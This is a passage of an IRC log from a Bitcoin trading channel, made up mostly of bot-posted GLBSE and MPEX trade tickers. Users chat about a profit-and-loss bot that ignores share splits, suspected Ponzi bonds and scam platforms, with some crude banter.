06 22:47:32 [MPEX] [F.GIGA.ETF] 3325 @ 0.00080755 = 2.6851 BTC [-] Sep 06 22:47:49 [MPEX] [F.GIGA.ETF] 3164 @ 0.00080755 = 2.5551 BTC [-] Sep 06 22:47:50 [MPEX] [F.GIGA.ETF] 15418 @ 0.00080439 = 12.4021 BTC [-] Sep 06 22:53:03 [MPEX] [O.BTCUSD.P120T] 180 @ 0.24918261 = 44.8529 BTC [-] Sep 06 22:56:30 [GLBSE] [GSDPT] 42 @ 0.0034 = 0.1428 BTC [+] Sep 06 22:59:04 [MPEX] [S.MPOE] 19069 @ 0.00040212 = 7.668 BTC [+] Sep 06 22:59:05 [MPEX] [S.MPOE] 12331 @ 0.00040348 = 4.9753 BTC [+] Sep 06 23:05:03 [MPEX] [S.MPOE] 21000 @ 0.00040348 = 8.4731 BTC [+] Sep 06 23:07:43 [GLBSE] [PPT.A] 24 @ 0.3200001 = 7.68 BTC [+] Sep 06 23:08:15 [GLBSE] [ASICMINER] 5 @ 0.122 = 0.61 BTC [+] Sep 06 23:10:39 what movie? Sep 06 23:13:59 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 06 23:14:55 [MPEX] [F.GIGA.ETF] 1471 @ 0.00079964 = 1.1763 BTC [-] Sep 06 23:15:30 [GLBSE] [ASICMINER] 7 @ 0.119 = 0.833 BTC [-] Sep 06 23:16:46 i havent understood too much the whole story Sep 06 23:17:11 [GLBSE] [FDBF] 30 @ 0.15 = 4.5 BTC [+] Sep 06 23:18:27 [GLBSE] [FDBF] 6 @ 0.15 = 0.9 BTC [+] Sep 06 23:18:46 he's not using escrow, correct? Sep 06 23:19:31 usagi: isn't the matthew thing a big part of nyan.c assets? Sep 06 23:20:04 the bet Sep 06 23:23:16 still bids on the PPT's…certainly a hail mary gamble Sep 06 23:25:03 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 06 23:25:39 i'd bid .02 at this point Sep 06 23:25:51 you never know i guess Sep 06 23:26:31 [GLBSE] [HYDRO.BONDS] 1 @ 1.48 BTC [-] Sep 06 23:30:42 [GLBSE] [JAH] 1 @ 0.149 BTC [-] Sep 06 23:37:20 [GLBSE] [OBSI.HRPT] 1 @ 0.10427 BTC [-] Sep 06 23:46:28 [GLBSE] [TYGRR.BOND-P] 100 @ 0.089 = 8.9 BTC [-] Sep 06 23:46:29 [GLBSE] [TYGRR.BOND-P] 30 @ 0.09 = 2.7 BTC [+] Sep 06 23:46:30 [GLBSE] [TYGRR.BOND-P] 30 @ 0.099 = 2.97 BTC [+] Sep 06 23:48:26 [MPEX] [S.DICE] 100 @ 0.0034 = 0.34 BTC [+] Sep 06 23:50:05 [GLBSE] [MERGEDMINING] 100 @ 0.064998 = 6.4998 BTC [+] Sep 06 23:50:40 [GLBSE] [SS] 9 @ 0.021 = 0.189 BTC [-] Sep 06 23:51:03 [GLBSE] [GSDPT] 20 @ 0.003395 = 0.0679 BTC [-] Sep 06 23:51:15 [GLBSE] [OBSI.HRPT] 1 @ 0.10427 BTC [-] Sep 06 23:52:08 [GLBSE] [OBSI.HRPT] 15 @ 0.10428 = 1.5642 BTC [+] Sep 06 23:55:55 [MPEX] [S.MPOE] 33400 @ 0.00039971 = 13.3503 BTC [-] Sep 07 00:04:18 [GLBSE] [SILVER] 4 @ 0.00999999 = 0.04 BTC [+] Sep 07 00:06:03 [GLBSE] [SILVER] 32 @ 0.01 = 0.32 BTC [+] Sep 07 00:13:24 [GLBSE] [OBSI.HRPT] 500 @ 0.10428 = 52.14 BTC [+] Sep 07 00:25:09 [GLBSE] [YARR] 20 @ 1.1 = 22 BTC [+] Sep 07 00:25:11 [GLBSE] [YARR] 4 @ 1.2 = 4.8 BTC [+] Sep 07 00:29:56 [GLBSE] [FUTUREFUND] 1 @ 0.00012433 BTC [+] Sep 07 00:30:29 [GLBSE] [BBBB] 1 @ 0.00024 BTC [+] Sep 07 00:32:50 [GLBSE] [BDT] 1 @ 1.02 BTC [-] Sep 07 00:39:13 [GLBSE] [GMVT-BOT] 2 @ 0.1689 = 0.3378 BTC [+] Sep 07 00:39:59 [GLBSE] [FPGA.CONTRACT] 3 @ 0.072 = 0.216 BTC [-] Sep 07 00:42:45 [GLBSE] [DI.BFLSC.FAIL] 25 @ 0.001 = 0.025 BTC [+] Sep 07 00:43:21 [GLBSE] [BITBOND] 17 @ 0.4 = 6.8 BTC [+] Sep 07 00:43:22 [GLBSE] [BITBOND] 5 @ 0.4001 = 2.0005 BTC [+] Sep 07 00:43:48 [GLBSE] [BIF.5-10.MININGBOND] 16 @ 0.8 = 12.8 BTC [+] Sep 07 00:44:29 [GLBSE] [OBSI.HRPT] 1 @ 0.10427 BTC [-] Sep 07 00:45:19 [GLBSE] [GIGAMINING] 13 @ 0.78 = 10.14 BTC [-] Sep 07 00:48:44 [GLBSE] [FPGAMINING] 5 @ 0.81 = 4.05 BTC [+] Sep 07 00:48:45 [GLBSE] [FPGAMINING] 10 @ 0.82 = 8.2 BTC [+] Sep 07 00:48:47 [GLBSE] [FPGAMINING] 4 @ 0.824 = 3.296 BTC [+] Sep 07 00:49:56 [GLBSE] [ASICMINER] 2 @ 0.122 = 0.244 BTC [+] Sep 07 00:51:10 [GLBSE] [PUREMINING] 74 @ 0.0931 = 6.8894 BTC [-] Sep 07 00:52:53 [GLBSE] [OBSI.HRPT] 42 @ 0.10427 = 4.3793 BTC [-] Sep 07 00:56:44 [GLBSE] [OBSI.HRPT] 8 @ 0.10427 = 0.8342 BTC [-] Sep 07 00:56:57 [GLBSE] [YARR] 6 @ 1.29999999 = 7.8 BTC [+] Sep 07 01:02:51 [GLBSE] [OBSI.HRPT] 7 @ 0.10426 = 0.7298 BTC [-] Sep 07 01:04:11 [GLBSE] [BITCOINRS] 6 @ 0.05 = 0.3 BTC [-] Sep 07 01:12:26 !pl ss 1 Sep 07 01:12:26 Requesting data from GLBSE (might take a while). Sep 07 01:12:42 i bet this'll be wrong now Sep 07 01:12:53 SS [1@1BTC] paid: 0.59016283 BTC. Last price: 0.021 BTC. Capital gain: -0.979 BTC. Total: -0.38883717 BTC. (-38.9%) Sep 07 01:13:14 yup Sep 07 01:13:24 kakobrekla: your thingy doesn't account for splits Sep 07 01:13:41 hm? Sep 07 01:14:13 ss had a 100 for one split, and now your pl command registeres it as a loss Sep 07 01:14:40 aha Sep 07 01:14:41 that sucks Sep 07 01:14:57 [GLBSE] [GSDPT] 380 @ 0.003395 = 1.2901 BTC [-] Sep 07 01:17:34 kakobrekla: would it be possible to add a 'disclaimer' about stplits to the line 'requesting data from ...'? Sep 07 01:17:54 *splits Sep 07 01:19:14 hey smickles Sep 07 01:19:30 hey Rothgar, i'm just now looking at that message :) Sep 07 01:19:45 Great Sep 07 01:21:58 !pl ss 1 Sep 07 01:21:59 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 07 01:22:02 SS [1@1BTC] paid: 0.59016283 BTC. Last price: 0.021 BTC. Capital gain: -0.979 BTC. Total: -0.38883717 BTC. (-38.9%) Sep 07 01:22:16 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09687267 BTC [-] Sep 07 01:22:33 lol Sep 07 01:22:34 [MPEX] [S.MPOE] 18952 @ 0.00039971 = 7.5753 BTC [-] Sep 07 01:22:36 [MPEX] [S.MPOE] 4248 @ 0.00040025 = 1.7003 BTC [+] Sep 07 01:22:42 That's a quick fix Sep 07 01:23:03 Well, hack more than fix Sep 07 01:23:10 [MPEX] [F.GIGA.ETF] 19200 @ 0.0008 = 15.36 BTC [+] Sep 07 01:23:11 :D Sep 07 01:23:17 well it is what it is Sep 07 01:23:22 [MPEX] [S.DICE] 550 @ 0.0034 = 1.87 BTC [+] Sep 07 01:23:34 It's ok Sep 07 01:23:38 Better than nothing Sep 07 01:24:11 what'd be better tho ?! Sep 07 01:25:39 With the current state of things, there aren't a lot of options Sep 07 01:25:57 glbse should account somewhere for splits, I guess Sep 07 01:29:22 thanks kakobrekla :0 Sep 07 01:29:26 * :) Sep 07 01:31:08 [MPEX] [O.BTCUSD.P110N] 2 @ 0.30719969 = 0.6144 BTC [+] Sep 07 01:31:10 [MPEX] [O.BTCUSD.P120N] 1 @ 0.38152815 BTC [+] Sep 07 01:31:36 ;;bc 24h,prc Sep 07 01:31:37 Error: "bc" is not a valid command. Sep 07 01:31:45 ;;bc,24hprc Sep 07 01:31:46 10.93 Sep 07 01:32:06 rogue commas :/ Sep 07 01:32:54 .py 0.30719969 * 10.93 Sep 07 01:32:55 3.3576926117 Sep 07 01:33:15 ;;calc .38*10.93 Sep 07 01:33:15 4.1534 Sep 07 01:39:37 [GLBSE] [OBSI.HRPT] 1 @ 0.10426 BTC [-] Sep 07 01:41:03 [GLBSE] [KRAKEN] 250 @ 0.00999999 = 2.5 BTC [+] Sep 07 01:41:24 [GLBSE] [V.HRL] 2 @ 0.999999 = 2 BTC [-] Sep 07 01:44:44 [MPEX] [S.MPOE] 470 @ 0.00039922 = 0.1876 BTC [-] Sep 07 01:44:46 [MPEX] [S.MPOE] 16689 @ 0.00039835 = 6.6481 BTC [-] Sep 07 01:44:47 [MPEX] [S.MPOE] 41341 @ 0.00039743 = 16.4302 BTC [-] Sep 07 01:45:07 http://bitbin.it/cKQcMsS1 Sep 07 01:48:07 bitbin needs to auto-wordwrap Sep 07 01:49:14 [GLBSE] [ASICMINER] 40 @ 0.122 = 4.88 BTC [+] Sep 07 01:49:32 [GLBSE] [ASICMINER] 1 @ 0.122 BTC [+] Sep 07 01:50:41 [GLBSE] [GSDPT] 180 @ 0.0034 = 0.612 BTC [+] Sep 07 01:50:43 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09700054 BTC [+] Sep 07 01:50:44 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09773765 BTC [+] Sep 07 01:50:45 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09778655 BTC [+] Sep 07 01:50:46 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09838176 BTC [+] Sep 07 01:50:47 [GLBSE] [TYGRR.BOND-P] 2 @ 0.09847926 = 0.197 BTC [+] Sep 07 01:50:48 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09864837 BTC [+] Sep 07 01:50:50 [GLBSE] [TYGRR.BOND-P] 1 @ 0.0988387 BTC [+] Sep 07 01:50:51 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09891847 BTC [+] Sep 07 01:50:52 [GLBSE] [TYGRR.BOND-P] 70 @ 0.099 = 6.93 BTC [+] Sep 07 01:50:53 [GLBSE] [TYGRR.BOND-P] 1 @ 0.09924255 BTC [+] Sep 07 01:50:53 [GLBSE] [TYGRR.BOND-P] 34 @ 0.1 = 3.4 BTC [+] Sep 07 01:50:54 [GLBSE] [TYGRR.BOND-P] 2 @ 0.10499999 = 0.21 BTC [+] Sep 07 01:50:55 [GLBSE] [TYGRR.BOND-P] 40 @ 0.105 = 4.2 BTC [+] Sep 07 01:50:57 [GLBSE] [TYGRR.BOND-P] 44 @ 0.108 = 4.752 BTC [+] Sep 07 01:54:49 who the hell is buing these ?! Sep 07 01:55:48 [MPEX] [S.MPOE] 15059 @ 0.00039743 = 5.9849 BTC [-] Sep 07 01:55:49 [MPEX] [S.MPOE] 45743 @ 0.00039733 = 18.1751 BTC [-] Sep 07 02:02:16 [GLBSE] [TYGRR.BOND-P] 6 @ 0.108 = 0.648 BTC [+] Sep 07 02:02:18 [GLBSE] [TYGRR.BOND-P] 20 @ 0.109 = 2.18 BTC [+] Sep 07 02:02:19 [GLBSE] [TYGRR.BOND-P] 1 @ 0.11 BTC [+] Sep 07 02:03:32 mircea_popescu: people who think there is better than a 1 in 10 chance of pirate paying back? Sep 07 02:03:52 yea, i want to meet these people. Sep 07 02:04:05 i want to like... go to their garden parties and be introduced to their wives. Sep 07 02:04:20 mircea_popescu: meet them to sell them a bridge? Sep 07 02:04:52 not necessarily, i think they'd be more amusing than rich. Sep 07 02:05:03 ;;ticker Sep 07 02:05:03 Best bid: 11.2, Best ask: 11.267, Bid-ask spread: 0.06700, Last trade: 11.266, 24 hour volume: 68414, 24 hour low: 10.64, 24 hour high: 11.29 Sep 07 02:05:07 really bitcoin? Sep 07 02:05:11 o wow 11 Sep 07 02:06:08 and i just saw someone buy thoe 4 usd premium puts Sep 07 02:06:10 [MPEX] [F.GIGA.ETF] 12218 @ 0.0008 = 9.7744 BTC [+] Sep 07 02:06:23 which ? Sep 07 02:06:36 um, 11 and 12, iirc Sep 07 02:06:47 o. well just 1-2 units, Sep 07 02:07:17 i like to think in terms of percentages Sep 07 02:09:06 [GLBSE] [OBSI.HRPT] 2 @ 0.10426 = 0.2085 BTC [-] Sep 07 02:11:49 ;;ticker Sep 07 02:11:51 Best bid: 11.26199, Best ask: 11.262, Bid-ask spread: 0.00001, Last trade: 11.263, 24 hour volume: 68206, 24 hour low: 10.64, 24 hour high: 11.29 Sep 07 02:22:55 [GLBSE] [NASTY] 5 @ 0.6102 = 3.051 BTC [-] Sep 07 02:23:57 [GLBSE] [ASICMINER] 15 @ 0.122 = 1.83 BTC [+] Sep 07 02:28:14 [GLBSE] [BDT] 2 @ 1.04 = 2.08 BTC [+] Sep 07 02:29:19 [GLBSE] [BDT] 3 @ 1.05 = 3.15 BTC [+] Sep 07 02:30:04 [GLBSE] [BDT] 1 @ 1.06 BTC [+] Sep 07 02:30:17 hm so at this point bdt is a ponzy or smth Sep 07 02:31:15 I feel very relieved since I sold all BDT.. Sep 07 02:35:28 kakobrekla i don't understand it either Sep 07 02:35:36 wasn't this the failed kronos.io/jro etc ? Sep 07 02:35:59 bdt = site offline still paying out div from nowhere Sep 07 02:36:02 afaik Sep 07 02:39:56 but it was the bond that was supposed to finance the kronos thing neh ? Sep 07 02:43:11 [GLBSE] [FUTUREFUND] 4 @ 0.00012433 = 0.0005 BTC [+] Sep 07 02:43:27 [GLBSE] [BLUECHIP] 1 @ 0.1 BTC Sep 07 02:47:20 I feel like all online wallets/trading platform related to bitcoins popping up nowadays are automatically a scam... Sep 07 02:48:57 That or each time one fails, someone else pop ups with that thought: "I don't know squat about security or even understand the concept of it, but SURELY if I make a platform it will be 100% better and secure because I made it instead of grossly incompetent people. I'm FLAWLESS." Sep 07 02:49:01 [MPEX] [S.MPOE] 10557 @ 0.00039733 = 4.1946 BTC [-] Sep 07 02:49:02 [MPEX] [S.MPOE] 4740 @ 0.00039722 = 1.8828 BTC [-] Sep 07 02:49:10 [GLBSE] [GSDPT] 3 @ 0.00339 = 0.0102 BTC [-] Sep 07 02:49:12 That or each time one fails, someone else pop ups with that thought: "I don't know squat about security or even understand the concept of it, but SURELY if I make a platform it will be 100% better and secure because I made it instead of grossly incompetent people. I'm FLAWLESS." <<< this. Sep 07 02:49:17 this is really the root cause. Sep 07 02:49:52 the internet generation is possibly the most failed, fucked up, loser-y thing in the history of civilisation. Sep 07 02:50:48 Looks like I'm part of it. =/ Sep 07 02:52:10 [GLBSE] [GSDPT] 1000 @ 0.00339 = 3.39 BTC [-] Sep 07 02:52:16 were you born after 1990 ?! Sep 07 02:52:38 after? No, right on it. Sep 07 02:52:42 suck dude. Sep 07 02:52:46 sucks* Sep 07 02:54:51 [GLBSE] [JAH] 1 @ 0.149 BTC [-] Sep 07 02:55:23 [GLBSE] [ASICMINER] 1 @ 0.12 BTC [-] Sep 07 02:56:17 [GLBSE] [MU] 1 @ 0.3787 BTC [+] Sep 07 02:57:53 [GLBSE] [GSDPT] 497 @ 0.00339 = 1.6848 BTC [-] Sep 07 02:59:08 [GLBSE] [GSDPT] 382 @ 0.0034 = 1.2988 BTC [+] Sep 07 03:02:08 [GLBSE] [NYAN.B] 4 @ 1 = 4 BTC [+] Sep 07 03:02:08 [GLBSE] [NYAN.C] 6 @ 0.699 = 4.194 BTC [-] Sep 07 03:02:32 no internet for old men Sep 07 03:02:55 are ye kidding ? the internet is strictly an old men affair. Sep 07 03:03:31 you've not seen the movie? Sep 07 03:04:00 also, I am positively geriatric in internet terms Sep 07 03:04:26 i haven't actually seen the movie, but i did get you were referring. Sep 07 03:04:35 see it, its rad Sep 07 03:04:36 i concur the kids rule the internet Sep 07 03:04:45 jcpham rule ? as in, make most noise ? Sep 07 03:04:49 resolve ito integrals ? Sep 07 03:05:00 I was born in the olden days Sep 07 03:05:05 strength in numbers? Sep 07 03:05:11 no strength in numbers. Sep 07 03:05:20 the internet is exactly the temple of, strenght in knowledge. Sep 07 03:05:31 maybe once Sep 07 03:05:33 always. Sep 07 03:05:43 nah it a toxic waste dump Sep 07 03:05:45 i hold the passwords to many sites. all of them have users, some very many users Sep 07 03:05:46 irc is pure Sep 07 03:05:55 if i feel like replacing them with a fuck you poster, i do. Sep 07 03:05:55 bitcoin is like someone fired an enfield in elektro Sep 07 03:06:02 they can like it or not, fuckall matters. Sep 07 03:06:12 irc and bitcoin are the only internet i know about Sep 07 03:06:19 now theres a bunch of zombies running in retarded circles around the hospital Sep 07 03:06:20 internet is all about the power of one over all. Sep 07 03:06:20 i haven't heard about the rest yet Sep 07 03:07:54 jcpham: the other one is 4chan Sep 07 03:10:10 nah i never used the 4chan Sep 07 03:10:23 i stop using the internet between 2002 nd last year Sep 07 03:12:15 I've never used the internet Sep 07 03:12:31 the internet uses me Sep 07 03:14:13 [GLBSE] [BIF.1YR.LOAN] 3 @ 0.98076923 = 2.9423 BTC [+] Sep 07 03:15:53 [GLBSE] [OBSI.HRPT] 5 @ 0.10426 = 0.5213 BTC [-] Sep 07 03:18:17 this rules http://www.youtube.com/watch?v=SaFLd-hVKFY Sep 07 03:18:49 http://polimedia.us/dtng/c/ << better than 4chan Sep 07 03:20:38 http://www.youtube.com/watch?v=AQXVHITd1N4 Sep 07 03:20:41 this is just as good :D Sep 07 03:21:43 haha Sep 07 03:22:42 that movie was cool Sep 07 03:22:46 ya Sep 07 03:26:46 [GLBSE] [GSDPT] 250 @ 0.003201 = 0.8003 BTC [-] Sep 07 03:26:48 [GLBSE] [GSDPT] 36 @ 0.0032 = 0.1152 BTC [-] Sep 07 03:26:49 [GLBSE] [GSDPT] 51 @ 0.00315 = 0.1607 BTC [-] Sep 07 03:26:50 [GLBSE] [GSDPT] 30 @ 0.003105 = 0.0932 BTC [-] Sep 07 03:26:52 [GLBSE] [GSDPT] 512 @ 0.0031 = 1.5872 BTC [-] Sep 07 03:31:24 [GLBSE] [FDBF] 6 @ 0.15 = 0.9 BTC [+] Sep 07 03:36:47 [GLBSE] [BIB.PIRATE] 103 @ 0.098 = 10.094 BTC [-] Sep 07 03:37:36 [MPEX] [F.GIGA.ETF] 7900 @ 0.00081556 = 6.4429 BTC [+] Sep 07 03:41:01 [GLBSE] [BFLS] 1 @ 0.95 BTC [+] Sep 07 03:41:03 [GLBSE] [BFLS] 1 @ 0.95 BTC [+] Sep 07 03:41:04 [GLBSE] [BFLS] 5 @ 0.98 = 4.9 BTC [+] Sep 07 03:41:05 [GLBSE] [BFLS] 1 @ 0.98 BTC [+] Sep 07 03:41:06 [GLBSE] [BFLS] 1 @ 0.99 BTC [+] Sep 07 03:41:08 [GLBSE] [NYAN] 1 @ 0.99 BTC [-] Sep 07 03:41:14 .py 38250*0.00336000 + 100000*0.00335100 + 15000*0.00335000 + 365300*0.00332500 + 107256*0.00330000 + 66687*0.00320000 Sep 07 03:41:17 2295.8357 Sep 07 03:41:33 lol. everyone wants a deal. Sep 07 03:47:24 [GLBSE] [BIB.PIRATE] 19 @ 0.1 = 1.9 BTC [+] Sep 07 03:49:57 [GLBSE] [PUREMINING] 1 @ 0.0931 BTC [-] Sep 07 03:50:21 [GLBSE] [OBSI.HRPT] 1 @ 0.10426 BTC [-] Sep 07 03:56:04 [MPEX] [S.MPOE] 16491 @ 0.0004 = 6.5964 BTC [+] Sep 07 03:56:06 [MPEX] [S.MPOE] 10291 @ 0.00040025 = 4.119 BTC [+] Sep 07 03:56:07 [MPEX] [S.MPOE] 24846 @ 0.00040204 = 9.9891 BTC [+] Sep 07 03:58:23 [MPEX] [S.MPOE] 35154 @ 0.00040204 = 14.1333 BTC [+] Sep 07 03:58:24 [MPEX] [S.MPOE] 2640 @ 0.00040348 = 1.0652 BTC [+] Sep 07 03:58:25 [MPEX] [S.MPOE] 35400 @ 0.00040365 = 14.2892 BTC [+] Sep 07 03:58:26 [MPEX] [S.MPOE] 22300 @ 0.00040467 = 9.0241 BTC [+] Sep 07 03:58:27 [MPEX] [S.MPOE] 19361 @ 0.00040475 = 7.8364 BTC [+] Sep 07 03:58:28 [MPEX] [S.MPOE] 23807 @ 0.00040503 = 9.6425 BTC [+] Sep 07 03:58:29 [MPEX] [S.MPOE] 56400 @ 0.00040525 = 22.8561 BTC [+] Sep 07 03:58:31 [MPEX] [S.MPOE] 58300 @ 0.0004054 = 23.6348 BTC [+] Sep 07 03:58:32 [MPEX] [S.MPOE] 50300 @ 0.00040611 = 20.4273 BTC [+] Sep 07 03:58:33 [MPEX] [S.MPOE] 10500 @ 0.00040684 = 4.2718 BTC [+] Sep 07 03:58:34 [MPEX] [S.MPOE] 47700 @ 0.0004074 = 19.433 BTC [+] Sep 07 03:58:35 [MPEX] [S.MPOE] 16696 @ 0.0004077 = 6.807 BTC [+] Sep 07 03:58:35 [MPEX] [S.MPOE] 19700 @ 0.00040782 = 8.0341 BTC [+] Sep 07 03:58:36 [MPEX] [S.MPOE] 1742 @ 0.00040943 = 0.7132 BTC [+] Sep 07 03:59:37 [MPEX] [S.MPOE] 16158 @ 0.00040943 = 6.6156 BTC [+] Sep 07 04:00:41 [MPEX] [S.MPOE] 1600000 @ 0.00042 = 672 BTC [+] Sep 07 04:02:59 [MPEX] [S.DICE] 360745 @ 0.0034 = 1226.533 BTC [+] Sep 07 04:04:12 [MPEX] [F.GIGA.ETF] 13809 @ 0.00081556 = 11.2621 BTC [+] Sep 07 04:04:15 [GLBSE] [FPGAMINING] 1 @ 0.745 BTC [-] Sep 07 04:04:16 [GLBSE] [FPGAMINING] 5 @ 0.74311 = 3.7156 BTC [-] Sep 07 04:04:18 [GLBSE] [FPGAMINING] 6 @ 0.74301 = 4.4581 BTC [-] Sep 07 04:04:18 [GLBSE] [FPGAMINING] 8 @ 0.7428 = 5.9424 BTC [-] Sep 07 04:04:19 [GLBSE] [FPGAMINING] 1 @ 0.741 BTC [-] Sep 07 04:04:21 [GLBSE] [FPGAMINING] 9 @ 0.741 = 6.669 BTC [-] Sep 07 04:11:08 mircea_popescu: it would be interesting to see a graph of mpex daily volume Sep 07 04:11:20 aite. Sep 07 04:21:40 maximian http://trilema.com/2012/volumul-tranzactiilor-pe-mpex/ Sep 07 04:22:43 That's great, thanks! Sep 07 04:23:20 yw. Sep 07 04:29:30 [MPEX] [B.MPCD.B] 30000 @ 0.00100855 = 30.2565 BTC [+] Sep 07 04:36:22 [GLBSE] [GIGAMINING] 3 @ 0.78 = 2.34 BTC [-] Sep 07 04:42:33 [GLBSE] [FUTUREFUND] 1 @ 0.00012433 BTC [+] Sep 07 04:49:17 [GLBSE] [OBSI.HRPT] 2 @ 0.10426 = 0.2085 BTC [-] Sep 07 04:50:33 [GLBSE] [MOVETO.FUND] 10 @ 1.1299 = 11.299 BTC [+] Sep 07 04:52:17 [MPEX] [F.GIGA.ETF] 900 @ 0.00082584 = 0.7433 BTC [+] Sep 07 04:54:07 [GLBSE] [GIGAMINING] 14 @ 0.78 = 10.92 BTC [-] Sep 07 04:54:08 [GLBSE] [GIGAMINING] 70 @ 0.78 = 54.6 BTC [-] Sep 07 04:55:09 [GLBSE] [OBSI.HRPT] 1 @ 0.10426 BTC [-] Sep 07 04:55:28 [GLBSE] [DI.BFLSC.FAIL] 10 @ 0.001 = 0.01 BTC [+] Sep 07 04:57:42 [MPEX] [F.GIGA.ETF] 22728 @ 0.00084278 = 19.1547 BTC [+] Sep 07 04:57:44 [MPEX] [F.GIGA.ETF] 6261 @ 0.00081957 = 5.1313 BTC [-] Sep 07 04:57:44 [MPEX] [F.GIGA.ETF] 14100 @ 0.00080607 = 11.3656 BTC [-] Sep 07 04:57:45 [MPEX] [F.GIGA.ETF] 8282 @ 0.00080473 = 6.6648 BTC [-] Sep 07 04:57:46 [MPEX] [F.GIGA.ETF] 21171 @ 0.00080386 = 17.0185 BTC [-] Sep 07 04:57:48 [MPEX] [F.GIGA.ETF] 914 @ 0.00079964 = 0.7309 BTC [-] Sep 07 04:57:49 [MPEX] [F.GIGA.ETF] 23600 @ 0.00079807 = 18.8345 BTC [-] Sep 07 04:57:50 [MPEX] [F.GIGA.ETF] 16000 @ 0.00079026 = 12.6442 BTC [-] Sep 07 04:57:51 [MPEX] [F.GIGA.ETF] 811 @ 0.00078855 = 0.6395 BTC [-] Sep 07 04:57:52 [MPEX] [F.GIGA.ETF] 700 @ 0.0007867 = 0.5507 BTC [-] Sep 07 04:57:52 [MPEX] [F.GIGA.ETF] 24600 @ 0.00077365 = 19.0318 BTC [-] Sep 07 05:08:39 [GLBSE] [NYAN.B] 5 @ 1 = 5 BTC [+] Sep 07 05:10:56 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 07 05:12:14 [MPEX] [S.MPOE] 7300 @ 0.00041102 = 3.0004 BTC [-] Sep 07 05:12:16 [MPEX] [S.MPOE] 10568 @ 0.00041264 = 4.3608 BTC [+] Sep 07 05:17:40 [GLBSE] [RAREEARTH] 5 @ 0.0096 = 0.048 BTC [+] Sep 07 05:23:48 [GLBSE] [GIGAMINING] 6 @ 0.7819 = 4.6914 BTC [+] Sep 07 05:23:49 [GLBSE] [GIGAMINING] 20 @ 0.782 = 15.64 BTC [+] Sep 07 05:27:06 [GLBSE] [ASICMINER] 1 @ 0.12 BTC [-] Sep 07 05:36:59 [GLBSE] [GSDPT] 10000 @ 0.0034 = 34 BTC [+] Sep 07 05:47:56 ;;ticker gsdpt Sep 07 05:47:56 (ticker [--bid|--ask|--last|--high|--low]) -- Return pretty-printed mtgox ticker. If one of the options is given, returns only that numeric result (useful for nesting in calculations). Sep 07 05:48:01 ;;pl gsdpt Sep 07 05:48:02 Error: "pl" is not a valid command. Sep 07 05:48:07 !pl gsdpt Sep 07 05:48:08 !pl [@] [] Sep 07 05:48:15 !pl GSDPT Sep 07 05:48:15 !pl [@] [] Sep 07 05:48:18 FFFFFFf Sep 07 05:53:53 it needs a number or somethin Sep 07 05:54:01 [MPEX] [F.GIGA.ETF] 8000 @ 0.00076845 = 6.1476 BTC [-] Sep 07 05:54:01 !pl GSDPT 1 Sep 07 05:54:02 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 07 05:54:03 GSDPT [1@1BTC] paid: 7.468E-5 BTC. Last price: 0.0034 BTC. Capital gain: -0.9966 BTC. Total: -0.99652532 BTC. (-99.7%) Sep 07 05:54:31 *shrug* Sep 07 05:54:56 !pl GSDPT 0.0032 Sep 07 05:54:56 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 07 05:55:02 GSDPT [1@0.0032BTC] paid: 7.468E-5 BTC. Last price: 0.0034 BTC. Capital gain: 0.0002 BTC. Total: 0.00027468 BTC. (8.6%) Sep 07 05:55:09 If you bought the first block Sep 07 05:56:14 [GLBSE] [GIGAMINING] 1 @ 0.771 BTC [-] Sep 07 05:56:28 [GLBSE] [OBSI.HRPT] 1 @ 0.10426 BTC [-] Sep 07 05:57:49 [MPEX] [S.MPOE] 2700 @ 0.00041264 = 1.1141 BTC [+] Sep 07 05:58:54 [GLBSE] [GIGAMINING] 1 @ 0.74010001 BTC [-] Sep 07 05:58:56 [GLBSE] [GIGAMINING] 1 @ 0.7401 BTC [-] Sep 07 05:59:29 [MPEX] [F.GIGA.ETF] 4138 @ 0.00076845 = 3.1798 BTC [-] Sep 07 05:59:30 [MPEX] [F.GIGA.ETF] 415 @ 0.00070427 = 0.2923 BTC [-] Sep 07 06:00:01 8% in about... a week Sep 07 06:00:05 lmao there's a new pirate. Sep 07 06:00:08 oh i see Sep 07 06:00:13 [MPEX] [O.BTCUSD.P110T] 5 @ 0.16855109 = 0.8428 BTC [-] Sep 07 06:00:15 [MPEX] [O.BTCUSD.P170N] 1 @ 0.83711627 BTC [+] Sep 07 06:01:12 Does it work with mpex? Sep 07 06:01:22 !pl S.DICE 0.0032 Sep 07 06:01:23 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 07 06:01:29 No Sep 07 06:01:43 GLBSE 404 Sep 07 06:06:29 [GLBSE] [PAJKA.BOND] 1 @ 0.075 BTC [-] Sep 07 06:06:31 [GLBSE] [BDT] 2 @ 1.07 = 2.14 BTC [+] Sep 07 06:08:29 rdponticelli nah, all you have is ticker. Sep 07 06:08:43 !ticker s.dice Sep 07 06:08:45 [MPEX:S.DICE] 1day: 0.003325 / 0.00338316 / 0.0034 (606260 shares, 2,051.08 BTC), 30day: 0.0032 / 0.00328894 / 0.0034 (4143774 shares, 13,628.63 BTC) Sep 07 06:08:55 Yeah, I know about that one Sep 07 06:09:53 o wow, 2k today eh ? Sep 07 06:10:01 i guess dividends got people in gear. Sep 07 06:10:13 [MPEX] [S.MPOE] 800 @ 0.00041092 = 0.3287 BTC [-] Sep 07 06:13:38 [GLBSE] [RSM] 43 @ 0.2999 = 12.8957 BTC [-] Sep 07 06:14:17 [GLBSE] [RSM] 87 @ 0.3 = 26.1 BTC [+] Sep 07 06:26:41 [GLBSE] [BLUECHIP] 3 @ 0.1 = 0.3 BTC Sep 07 06:40:31 [GLBSE] [PUREMINING] 2 @ 0.0931 = 0.1862 BTC [-] Sep 07 06:41:01 [GLBSE] [PAJKA.BOND] 1 @ 0.075 BTC [-] Sep 07 06:42:04 [GLBSE] [GSDPT] 25 @ 0.0034 = 0.085 BTC [+] Sep 07 06:43:29 [GLBSE] 